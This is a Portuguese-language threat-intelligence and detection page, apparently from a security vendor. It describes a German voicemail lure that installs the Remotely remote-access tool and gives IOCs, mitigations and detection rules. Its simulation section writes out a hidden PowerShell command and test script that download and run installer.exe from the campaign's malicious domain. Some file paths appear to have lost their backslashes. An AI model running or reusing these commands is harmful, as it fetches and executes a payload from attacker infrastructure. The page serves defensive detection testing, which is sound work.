Seguir
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumo
Atores maliciosos estão hospedando páginas de destino em alemão de “correio de voz” que atraem os usuários a baixar um arquivo BAT. O script reproduz um áudio enganoso enquanto instala silenciosamente a legítima ferramenta de monitoramento remoto Remotely. Uma vez implantado, o agente RMM oferece ao invasor acesso remoto persistente através de uma infraestrutura C2 controlada pelo invasor.
Investigação
Censys identificou 86 propriedades web comprometidas em domínios *.cadillac.ps distribuindo o arquivo BAT malicioso. O script invoca um instalador PowerShell hospedado em remotely.billbutterworth.com, que obtém um pacote ZIP do Remotely. O arquivo contém os componentes do agente Remotely e um serviço que se instala em C:Program FilesRemotely.
Mitigação
Bloquear os domínios *.cadillac.ps e remotely.billbutterworth.com na camada DNS/proxy. Treinar os usuários a não executarem arquivos BAT inesperados ou copiar/colar comandos PowerShell de páginas desconhecidas. Implantar controles de endpoint para detectar a criação de serviço Remotely e caminhos de instalação suspeitos ou ferramentas não assinadas.
Resposta
Alertar sobre a criação do Remotely_Service e a presença do Remotely_Agent.exe em Program Files. Procurar por voicemail.bat e a atividade do instalador PowerShell associado. Isolar os hosts afetados, coletar artefatos forenses e rotacionar/revogar quaisquer credenciais ou tokens utilizados pelo agente RMM.
graph TB %% Definições de classes classDef action fill:#99ccff %% Nós node_content_injection[“<b>Técnica</b> – T1659 Injeção de Conteúdo<br/>Propriedade web comprometida fornece link malicioso.”] class node_content_injection action node_initial_user_exec[“<b>Técnica</b> – T1204.001 Execução pelo Usuário: Link Malicioso<br/>A vítima clica em um link malicioso para uma página de correio de voz comprometida.”] class node_initial_user_exec action node_cmd_shell[“<b>Técnica</b> – T1059.003 Shell de Comandos do Windows<br/>Arquivo BAT (voicemail.bat) baixado e executado.”] class node_cmd_shell action node_powershell[“<b>Técnica</b> – T1059.001 PowerShell<br/>Script Install-Remotely.ps1 instala o Remotely RMM.”] class node_powershell action node_system_service[“<b>Técnica</b> – T1569 Serviços do Sistema<br/>RMM instalado como serviço do Windows (Remotely_Service).”] class node_system_service action node_masquerading[“<b>Técnica</b> – T1036 Disfarce & T1036.008 Disfarçar Tipo de Arquivo<br/>BAT apresentado como atualização de mídia; arquivos colocados em Program Files.”] class node_masquerading action node_hide_artifacts[“<b>Técnica</b> – T1564 Ocultar Artefatos<br/>Artefatos de instalação ocultos em C:\Program Files\Remotely.”] class node_hide_artifacts action node_c2[“<b>Técnica</b> – T1102.002 Comunicação Bidirecional por Serviço Web & T1071 Protocolo de Camada de Aplicação<br/>Comunicação HTTPS com servidor remoto.”] class node_c2 action %% Conexões node_content_injection –>|suporta| node_initial_user_exec node_initial_user_exec –>|leva_a| node_cmd_shell node_cmd_shell –>|executa| node_powershell node_powershell –>|instala| node_system_service node_system_service –>|usa| node_masquerading node_system_service –>|usa| node_hide_artifacts node_system_service –>|estabelece| node_c2
Fluxo de Ataque
Detecções
Download ou Upload via Powershell (via linha de comando)
Visualizar
Parada de Serviço de Ransomware Suspeito (via linha de comando)
Visualizar
Powershell Executando Arquivo em Diretório Suspeito Usando Política de Execução de Bypass (via linha de comando)
Visualizar
IOCs (HashSha256) para detectar: Armadilha de Correio de Voz: Isca de Correio de Voz em Alemão Leva a Acesso Remoto
Visualizar
IOCs (HashMd5) para detectar: Armadilha de Correio de Voz: Isca de Correio de Voz em Alemão Leva a Acesso Remoto
Visualizar
Isca de Correio de Voz em Alemão Levando à Instalação de RMM [Servidor Web]
Visualizar
Detecção de Execução de Arquivo BAT de Correio de Voz [Evento de Arquivo do Windows]
Visualizar
Execução de Simulação
Pré-requisito: A Verificação de Pré-voo de Telemetria & Linha Base deve ter sido aprovada.
Racional: Esta seção detalha a execução precisa da técnica do adversário (TTP) projetada para acionar a regra de detecção. Os comandos e a narrativa DEVEM refletir diretamente os TTPs identificados e visam gerar a telemetria exata esperada pela lógica de detecção. Exemplos abstratos ou não relacionados levarão a um diagnóstico incorreto.
-
Narrativa & Comandos de Ataque:
- Entrega de Phishing: O atacante envia um e-mail com um anexo isca de correio de voz em alemão (HTML) que, quando aberto, redireciona a vítima para
http://bannerbank.cadillac.ps/voicemail.html. - Execução da Página de Destino: A página de destino hospeda um comando PowerShell de uma linha que baixa e executa um instalador de ferramenta de gerenciamento remoto (RMM).
- Criação de Processo: Quando o navegador da vítima processa a página, o PowerShell é invocado com uma linha de comando que explicitamente inclui os dois strings que a regra observa.
- Telemetria Resultante: Os logs do Windows registram o ID do Evento 4688 com um
CommandLinecontendo ambos “página de destino com tema de correio de voz” and “bannerbank.cadillac.ps”, satisfazendo assim a condição Sigma.
O comando exato usado para a simulação:
# Execução maliciosa simulada – contém ambas as strings de gatilho Start-Process -FilePath "powershell.exe" -ArgumentList "-NoProfile -WindowStyle Hidden -Command `"Write-Host 'página de destino com tema de correio de voz'; Invoke-WebRequest -Uri 'http://bannerbank.cadillac.ps/installer.exe' -OutFile $env:TEMPinstaller.exe; Start-Process $env:TEMPinstaller.exe`"" - Entrega de Phishing: O atacante envia um e-mail com um anexo isca de correio de voz em alemão (HTML) que, quando aberto, redireciona a vítima para
-
Script de Teste de Regressão: Um script PowerShell autossuficiente que reproduz o ataque e pode ser executado em qualquer host Windows com o registro necessário ativado.
<# .SYNOPSIS Simula a isca de correio de voz em alemão que aciona a regra de detecção Sigma. .DESCRIPTION Executa uma linha de comando PowerShell contendo ambas as substrings necessárias. #> # Definir strings maliciosas $lureText = "página de destino com tema de correio de voz" $maliciousDomain = "bannerbank.cadillac.ps" # Construir a linha única que aparecerá na linha de comando $payload = @" Write-Host '$lureText'; Invoke-WebRequest -Uri 'http://$maliciousDomain/installer.exe' -OutFile $env:TEMPinstaller.exe; Start-Process $env:TEMPinstaller.exe "@ # Iniciar o PowerShell com a linha de comando criada $psArgs = "-NoProfile -WindowStyle Hidden -Command `"$payload`"" Write-Host "Lançando comando malicioso do PowerShell..." Start-Process -FilePath "powershell.exe" -ArgumentList $psArgs -PassThru # Opcional: esperar alguns segundos para garantir o registro Start-Sleep -Seconds 5 -
Comandos de Limpeza: Remover o instalador baixado e quaisquer processos residuais.
# Parar qualquer processo de instalador residual Get-Process -Name "installer" -ErrorAction SilentlyContinue | Stop-Process -Force # Excluir o arquivo de instalador temporário $installerPath = "$env:TEMPinstaller.exe" if (Test-Path $installerPath) { Remove-Item $installerPath -Force Write-Host "Limpou $installerPath" }